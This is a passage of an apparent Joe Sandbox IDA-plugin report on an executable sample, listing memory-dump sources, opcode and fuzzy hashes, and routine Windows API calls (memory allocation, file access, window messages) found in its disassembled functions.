                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: Window$EnableShowlstrlenwvsprintf
                                                          • String ID: HideWindow
                                                          • API String ID: 1249568736-780306582
                                                          • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                          • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                          • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                          • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                          • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                          • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                          • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                          • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                          • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                          • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                          • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                          • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                          • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                          • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                          • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                          • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                          • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                          • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                          • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                          • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                          • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                          • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                          APIs
                                                          • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                          • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree
                                                          • String ID:
                                                          • API String ID: 3394109436-0
                                                          • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                          • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                          • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                          • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                          • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                          • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                          • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                          • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                          • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                          • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                          • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                          • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                          • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                          APIs
                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                          • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                          • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                          • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                          APIs
                                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                          • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                          • String ID:
                                                          • API String ID: 4115351271-0
                                                          • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                          • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                          • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                          • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                          APIs
                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                          • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                          • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                          • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                          • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                          • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                          • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                          APIs
                                                          • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                          • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                          • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                          • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                          • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                          • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                          • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                                          APIs
                                                          • CloseHandle.KERNELBASE(FFFFFFFF,00403AD1,?), ref: 00403864
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
